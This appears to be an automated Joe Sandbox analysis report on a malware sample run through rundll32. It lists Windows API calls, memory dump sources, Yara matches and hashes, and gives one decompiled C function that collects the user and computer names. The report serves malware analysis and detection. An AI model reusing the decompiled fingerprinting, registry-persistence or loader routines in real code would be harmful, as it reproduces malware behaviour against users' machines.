                                          • lstrcmpi.KERNEL32(00000002,?), ref: 00B527EA
                                          • memcpy.NTDLL(00000000,?,?), ref: 00B527FE
                                          • HeapFree.KERNEL32(00000000,00000000,?), ref: 00B52844
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
                                          • String ID:
                                          • API String ID: 733514052-0
                                          • Opcode ID: c6ba02dd62afc00ac29ebc8457c246cb191ca68a2355ac52f24f8ddb90f90cd7
                                          • Instruction ID: 91f30b26538db2263fe18cd16c93e45d39b78e3d42072a3937f7a19c2d5d231e
                                          • Opcode Fuzzy Hash: c6ba02dd62afc00ac29ebc8457c246cb191ca68a2355ac52f24f8ddb90f90cd7
                                          • Instruction Fuzzy Hash: D8318076900219BFDB109FA4DCC8B9E7BF8EF05355F1440A9FE09A7210E7359D888B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04893268 Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04893268() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E04894DF6(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E04894C73(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t56 + 2, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                          0x04893276
                                          0x04893279
                                          0x0489327c
                                          0x04893282
                                          0x04893287
                                          0x0489328d
                                          0x04893295
                                          0x04893298
                                          0x0489329e
                                          0x048932a3
                                          0x048932b0
                                          0x048932bd
                                          0x048932c1
                                          0x048932c3
                                          0x048932c7
                                          0x048932ca
                                          0x048932da
                                          0x0489332d
                                          0x0489332e
                                          0x048932dc
                                          0x048932e1
                                          0x048932e2
                                          0x048932e7
                                          0x048932ea
                                          0x048932fd
                                          0x00000000
                                          0x048932ff
                                          0x04893302
                                          0x04893315
                                          0x04893318
                                          0x0489331e
                                          0x04893323
                                          0x00000000
                                          0x04893325
                                          0x04893325
                                          0x04893328
                                          0x04893328
                                          0x04893323
                                          0x048932fd
                                          0x04893333
                                          0x04893334
                                          0x048932a3
                                          0x0489333a

                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 0489327C
                                          • GetComputerNameW.KERNEL32(00000000,?), ref: 04893298
                                            • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 048932D2
                                          • GetComputerNameW.KERNEL32(?,?), ref: 048932F5
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,?,00000000,?,00000000,00000000), ref: 04893318
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                          • String ID:
                                          • API String ID: 3850880919-0
                                          • Opcode ID: 222091d1aebd02bd5d05085a31ec2cf03a07b00bec1c2e7d624ec2196683bea8
                                          • Instruction ID: 5c4043dc8f9ed426dcfb26176e26a7fdb51aab5948d5cb7a61e3ac0d32d46c0c
                                          • Opcode Fuzzy Hash: 222091d1aebd02bd5d05085a31ec2cf03a07b00bec1c2e7d624ec2196683bea8
                                          • Instruction Fuzzy Hash: 9121F8B6900548FFDB11DFE8D9848EEBBB8EF48304B5449AAE501E7240EA34AF05DB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5E229 Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,00B5AB98), ref: 00B5E23D
                                          • GetComputerNameW.KERNEL32(00000000,00B5AB98), ref: 00B5E259
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • GetUserNameW.ADVAPI32(7477C740,00B5AB98), ref: 00B5E293
                                          • GetComputerNameW.KERNEL32(00B5AB98,?), ref: 00B5E2B6
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,7477C740,00B5AB98,00000000,00B5AB9A,00000000,00000000,?,?,00B5AB98), ref: 00B5E2D9
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                          • String ID:
                                          • API String ID: 3850880919-0
                                          • Opcode ID: cb58eab08aa1db17491cee674f44d04d82c2e66825153b40dc5b82d29059badb
                                          • Instruction ID: 1b729df3336740b780f2076014f884300f4801f8e570e170d8f08b432055b7ae
                                          • Opcode Fuzzy Hash: cb58eab08aa1db17491cee674f44d04d82c2e66825153b40dc5b82d29059badb
                                          • Instruction Fuzzy Hash: 7021F8B6900218FFCB11DFE8C9859AEBBFCEF48305B5044AAE915E7204DB319B44DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B71524 Relevance: 7.6, APIs: 5, Instructions: 83memorytimeCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B6C9C0: lstrlen.KERNEL32(00000000,00000000,?,00000000,00B71538,00000000,00000000,00000000,00000000,?,00000022,00000000,00000000,00000000,?,?), ref: 00B6C9CC
                                          • RtlEnterCriticalSection.NTDLL(00B79448), ref: 00B7154E
                                          • RtlLeaveCriticalSection.NTDLL(00B79448), ref: 00B71561
                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00B71572
                                          • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 00B715DD
                                          • InterlockedIncrement.KERNEL32(00B7945C), ref: 00B715F4
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
                                          • String ID:
                                          • API String ID: 3915436794-0
                                          • Opcode ID: f24338f4bba3b62f8dc59761bf1931953a5f9181bd4771d50666656b81744bac
                                          • Instruction ID: 9cb92928d81fb4ff6a9e9ec23cacc71a31198566e3bdfc9caed53b01d7ec7312
                                          • Opcode Fuzzy Hash: f24338f4bba3b62f8dc59761bf1931953a5f9181bd4771d50666656b81744bac
                                          • Instruction Fuzzy Hash: 6131B1325056059FC721DF6CD84892ABBF8FB44325F058969F96E83220DB30D852CBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B65E28 Relevance: 7.6, APIs: 5, Instructions: 83libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(?,?,00000000,00000000,00B6601E,00000000,76DDF5B0,00B6339A,?,00000001), ref: 00B65E48
                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B65E5D
                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B65E79
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B65E8E
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B65EA2
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad$AddressProc
                                          • String ID:
                                          • API String ID: 1469910268-0
                                          • Opcode ID: 1ea0e0829d7b33f3a6b2a90c8a003abe290c9f7245677b093f33609683aae8ec
                                          • Instruction ID: 80711d62f75e2ae03cec6fc124740a9aed4b3fa0e3bba920d94e63f6d815fa73
                                          • Opcode Fuzzy Hash: 1ea0e0829d7b33f3a6b2a90c8a003abe290c9f7245677b093f33609683aae8ec
                                          • Instruction Fuzzy Hash: C131BD72640606AFCB14CF68EC88E5133F9FB49310B8540A9E50CE7760DF35AD92CB01
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6105E Relevance: 7.6, APIs: 5, Instructions: 81filememoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B666BC: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B666CE
                                            • Part of subcall function 00B666BC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B666E7
                                            • Part of subcall function 00B666BC: GetCurrentThreadId.KERNEL32 ref: 00B666F4
                                            • Part of subcall function 00B666BC: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B66700
                                            • Part of subcall function 00B666BC: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B6670E
                                            • Part of subcall function 00B666BC: lstrcpy.KERNEL32(00000000), ref: 00B66730
                                          • DeleteFileA.KERNEL32(00000000,000004D2), ref: 00B61081
                                          • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00B6108A
                                          • GetLastError.KERNEL32 ref: 00B61094
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B61153
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
                                          • String ID:
                                          • API String ID: 3543646443-0
                                          • Opcode ID: f89c1f81cdb3d0dfb843f6266e42b0d09e9ac045e2efc8bbd58822de9f768697
                                          • Instruction ID: 665fc8f3d6f79dbe0cc75ed3bb6c6495b1228297bc4fa2793f87925ea5eef0e1
                                          • Opcode Fuzzy Hash: f89c1f81cdb3d0dfb843f6266e42b0d09e9ac045e2efc8bbd58822de9f768697
                                          • Instruction Fuzzy Hash: 0C2160B25052187FDA10A7A4EC4DF8B3BECDF46352B1540D1FB0ED7261DB649945CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B713BB Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,00B6A2F0,00000000,?,?), ref: 00B713D9
                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,00B6A2F0,00000000,?,?,?,00000000,-00000007,00B6377E,-00000007,?,00000000), ref: 00B713E9
                                          • ReadFile.KERNEL32(?,00000000,00000000,00000000,00000000,00000001,?,?,00B6A2F0,00000000,?,?,?,00000000,-00000007,00B6377E), ref: 00B71415
                                          • GetLastError.KERNEL32(?,?,00B6A2F0,00000000,?,?,?,00000000,-00000007,00B6377E,-00000007,?,00000000), ref: 00B7143A
                                          • CloseHandle.KERNEL32(000000FF,?,?,00B6A2F0,00000000,?,?,?,00000000,-00000007,00B6377E,-00000007,?,00000000), ref: 00B7144B
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseCreateErrorHandleLastReadSize
                                          • String ID:
                                          • API String ID: 3577853679-0
                                          • Opcode ID: 3987f0ce8bdf50afc2dfdcd4eb2117272a85cbb66ff58f3320c018cce2668bfa
                                          • Instruction ID: 273d2b9f26b98c11f245bbee62c24951b57af516df348e2a46cfbbe30354ca04
                                          • Opcode Fuzzy Hash: 3987f0ce8bdf50afc2dfdcd4eb2117272a85cbb66ff58f3320c018cce2668bfa
                                          • Instruction Fuzzy Hash: 2411E732100214BFDB205F6CDC84EAE7BEDEB04755F1189A5FE2DA7290C7709D808A70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5147E Relevance: 7.6, APIs: 5, Instructions: 71memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • StrChrA.SHLWAPI(?,0000002C), ref: 00B5148F
                                          • StrRChrA.SHLWAPI(?,00000000,0000002F), ref: 00B514A8
                                          • StrTrimA.SHLWAPI(?,?), ref: 00B514D0
                                          • StrTrimA.SHLWAPI(00000000,?), ref: 00B514DF
                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000), ref: 00B51516
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Trim$FreeHeap
                                          • String ID:
                                          • API String ID: 2132463267-0
                                          • Opcode ID: ab6f7491239176d689bd3c7c3075e4e25ae5331f059469d237f7e351ca228b6a
                                          • Instruction ID: 3ae8014104113065bcef2aefbd1cc40bec5303b57c74c21273a2980134ba3466
                                          • Opcode Fuzzy Hash: ab6f7491239176d689bd3c7c3075e4e25ae5331f059469d237f7e351ca228b6a
                                          • Instruction Fuzzy Hash: D2119636240205BBDB229B69DC88F9B7BECDB44751F1404A5FE09DB251DF71DD448B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6B6D8 Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VirtualProtect.KERNEL32(00000000,00000004,00000040,00000000,055CE5A8,00B6BAB4,00B6D73E,?,?,?,00B69DA8,76D85520,?,00B6BAB4,00000000), ref: 00B6B70F
                                          • VirtualProtect.KERNEL32(00000000,00000004,00000000,00000000,?,00B69DA8,76D85520,?,00B6BAB4,00000000,?,00000000,00B6D73E,00000000), ref: 00B6B73F
                                          • RtlEnterCriticalSection.NTDLL(00B79420), ref: 00B6B74E
                                          • RtlLeaveCriticalSection.NTDLL(00B79420), ref: 00B6B76C
                                          • GetLastError.KERNEL32(?,00B69DA8,76D85520,?,00B6BAB4,00000000,?,00000000,00B6D73E,00000000), ref: 00B6B77C
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                                          • String ID:
                                          • API String ID: 653387826-0
                                          • Opcode ID: caa810a6b6a5033091f893169b04b5ea8835e66e43f5d9e5a9c4272d9d3bb757
                                          • Instruction ID: e94392c2d750c2ca9df8fc013aec3fa3b266a12a0ccfdea4e4f0412f4c999cc4
                                          • Opcode Fuzzy Hash: caa810a6b6a5033091f893169b04b5ea8835e66e43f5d9e5a9c4272d9d3bb757
                                          • Instruction Fuzzy Hash: 6521EAB5600705EFC721DFA8C985956BBF8FF08314B008569EA5AD7710D770ED54CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B57B81 Relevance: 7.6, APIs: 5, Instructions: 67memorysynchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 00B57BAF
                                          • GetLastError.KERNEL32 ref: 00B57BD2
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B57BE5
                                          • GetLastError.KERNEL32 ref: 00B57BF0
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B57C38
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
                                          • String ID:
                                          • API String ID: 1671499436-0
                                          • Opcode ID: e985947da40575544a10bf1c2ea67fefe6ec4cd4e350939910b3b2076144945a
                                          • Instruction ID: f44d6991cf539ef47669c8275b444b6c7ea1ebd564b7042393f4effc91b87703
                                          • Opcode Fuzzy Hash: e985947da40575544a10bf1c2ea67fefe6ec4cd4e350939910b3b2076144945a
                                          • Instruction Fuzzy Hash: 2D21AE70244244EFEB219F54EC8CB5A7BF9EB00316F6008E8EA46975A0CF719DC8DB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B52F6E Relevance: 7.6, APIs: 5, Instructions: 65registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegCreateKeyA.ADVAPI32(80000001,?,-00000005), ref: 00B52F82
                                          • memcpy.NTDLL(00000000,00000001,-00000005,-00000005,-00000005,?,00B51B3D,?,00000000,-00000005,00000001), ref: 00B52FAB
                                          • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,-00000005), ref: 00B52FD4
                                          • RegSetValueExA.ADVAPI32(-00000005,?,00000000,00000003,00000000,00000000,-00000005,?,00B51B3D,?,00000000,-00000005,00000001), ref: 00B52FF4
                                          • RegCloseKey.ADVAPI32(-00000005,?,00B51B3D,?,00000000,-00000005,00000001), ref: 00B52FFF
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Value$AllocateCloseCreateHeapmemcpy
                                          • String ID:
                                          • API String ID: 2954810647-0
                                          • Opcode ID: 91e549ea2b59b41a10ecd8192e0e220ccb216df04e5e469e47ee313bbe53534e
                                          • Instruction ID: 523d79df3906f4f2a255276a394eb2fb1e36111c1df87c53880d409fd93ed729
                                          • Opcode Fuzzy Hash: 91e549ea2b59b41a10ecd8192e0e220ccb216df04e5e469e47ee313bbe53534e
                                          • Instruction Fuzzy Hash: D911A372140209BFDF125F64BC45FAB7BBDEB49352F0400A5FE05A32A1DA328D6497B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B60B6D Relevance: 7.6, APIs: 5, Instructions: 62memorystringtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00B60B8A
                                          • memcpy.NTDLL(?,?,00000009), ref: 00B60BAC
                                          • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 00B60BC4
                                          • lstrlenW.KERNEL32(?,00000001,?), ref: 00B60BE4
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?), ref: 00B60C09
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3065863707-0
                                          • Opcode ID: 3b4fd0e46f68c27dc773fb4e2ec0382122c059e04d844fd38e1c3df9dd6ce008
                                          • Instruction ID: cbd11dc920a9fb71f6ba4b97c38d6536b963a10ffc03d47cd956c7135fa98b2e
                                          • Opcode Fuzzy Hash: 3b4fd0e46f68c27dc773fb4e2ec0382122c059e04d844fd38e1c3df9dd6ce008
                                          • Instruction Fuzzy Hash: 04118636D41208BBDF119BA5DC49FCE7BB8EB08311F048091FA09E7291DB74D689CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B61843 Relevance: 7.6, APIs: 5, Instructions: 61stringtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrcmpi.KERNEL32(00000000,?), ref: 00B61872
                                          • RtlEnterCriticalSection.NTDLL(00B79448), ref: 00B6187F
                                          • RtlLeaveCriticalSection.NTDLL(00B79448), ref: 00B61892
                                          • lstrcmpi.KERNEL32(00B79460,00000000), ref: 00B618B2
                                          • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00B5D570,00000000), ref: 00B618C6
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
                                          • String ID:
                                          • API String ID: 1266740956-0
                                          • Opcode ID: c9fb0a4e44aa3d614589755353d168d96c67ccc93cce617193a794e276e8ed9b
                                          • Instruction ID: 541920651e18eb74f87247dae8c6603eae887fb2edde4b26c4bc1a456f97b688
                                          • Opcode Fuzzy Hash: c9fb0a4e44aa3d614589755353d168d96c67ccc93cce617193a794e276e8ed9b
                                          • Instruction Fuzzy Hash: F1118E32900209EFDB14DF5CD849A99B7F8FF04325F0980A6E51D93260DB38AD41CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B65B7E Relevance: 7.6, APIs: 5, Instructions: 60stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000008,00B64325,00000000,00000000,00000000,00000000,00000000,?,00B5479A,00000000,00000000,00000000,00000000), ref: 00B65B88
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00B65BAC
                                          • StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00000003,?,00B5479A,00000000,00000000,00000000,00000000), ref: 00B65BB3
                                          • lstrcpy.KERNEL32(00000000,?), ref: 00B65BFB
                                          • lstrcat.KERNEL32(00000000,?), ref: 00B65C0A
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$AllocateHeaplstrcatlstrlen
                                          • String ID:
                                          • API String ID: 2616531654-0
                                          • Opcode ID: bf1b294aefc177ce3393ffadbd534beb668917ab23cbdee53b9476c36b7d6ec7
                                          • Instruction ID: f33ea9016b5c24cec759c5f810efc53bdd7ae39a3324c4e44d198adb7e66ac80
                                          • Opcode Fuzzy Hash: bf1b294aefc177ce3393ffadbd534beb668917ab23cbdee53b9476c36b7d6ec7
                                          • Instruction Fuzzy Hash: CF117C76104606ABD7319F69DC88E6BBBECEB84341F090468F609D3240DF39DDA5C725
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6C301 Relevance: 7.6, APIs: 5, Instructions: 59memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B6C9C0: lstrlen.KERNEL32(00000000,00000000,?,00000000,00B71538,00000000,00000000,00000000,00000000,?,00000022,00000000,00000000,00000000,?,?), ref: 00B6C9CC
                                          • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00B6C32A
                                          • memcpy.NTDLL(00000000,?,?), ref: 00B6C33D
                                          • RtlEnterCriticalSection.NTDLL(00B79448), ref: 00B6C34E
                                          • RtlLeaveCriticalSection.NTDLL(00B79448), ref: 00B6C363
                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 00B6C39B
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
                                          • String ID:
                                          • API String ID: 2349942465-0
                                          • Opcode ID: a709e5eb0b227bbf50f427deb25e94281c7060d9007670094606d79b6878c9f9
                                          • Instruction ID: fb6efe801818919f1e3415f8b8c4c58622c9283cec5ae938cf90dfd809114161
                                          • Opcode Fuzzy Hash: a709e5eb0b227bbf50f427deb25e94281c7060d9007670094606d79b6878c9f9
                                          • Instruction Fuzzy Hash: 4811E572101250AFC7215F28EC88C6B7BFCEB4632270185BAF95E93320CB355C55CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6A952 Relevance: 7.6, APIs: 5, Instructions: 57memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(00B5B047,00000000,00000000,00000000,?,00B7090A,?,00B5B047,00000000), ref: 00B6A968
                                          • lstrlen.KERNEL32(?,?,00B7090A,?,00B5B047,00000000), ref: 00B6A96F
                                          • RtlAllocateHeap.NTDLL(00000000,00000029), ref: 00B6A97D
                                            • Part of subcall function 00B56FF3: GetLocalTime.KERNEL32(?,?,?,?,00B5161B,00000000,00000001), ref: 00B56FFD
                                            • Part of subcall function 00B56FF3: wsprintfA.USER32 ref: 00B57030
                                          • wsprintfA.USER32 ref: 00B6A99F
                                            • Part of subcall function 00B6EAB5: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,00B6A9C7,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 00B6EAD3
                                            • Part of subcall function 00B6EAB5: wsprintfA.USER32 ref: 00B6EAF8
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 00B6A9D0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
                                          • String ID:
                                          • API String ID: 3847261958-0
                                          • Opcode ID: ff8ae012625a843810aa1cdc11f12c73846d19c377518c7d8afd078651ef7e11
                                          • Instruction ID: d4dd53ba89a1ee7dc7262615aafea9be716272f43169300a160ff59ad95c36f7
                                          • Opcode Fuzzy Hash: ff8ae012625a843810aa1cdc11f12c73846d19c377518c7d8afd078651ef7e11
                                          • Instruction Fuzzy Hash: 3001C432100218BFDF112F66EC48E9A7F6EFB80761B108462FD1D97161DB368994DFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6C090 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                          Download Yara Rule
                                          APIs
                                          • ResetEvent.KERNEL32(?,00000008,00000000,0000EA60,00000000,00000000,00000000,?,00B6A6B6,?,?,00000000,00B5D3E9,?,00000000), ref: 00B6C0CF
                                          • ResetEvent.KERNEL32(?,?,00B6A6B6,?,?,00000000,00B5D3E9,?,00000000), ref: 00B6C0D4
                                          • GetLastError.KERNEL32(00B6A6B6,?,?,00000000,00B5D3E9,?,00000000), ref: 00B6C0EF
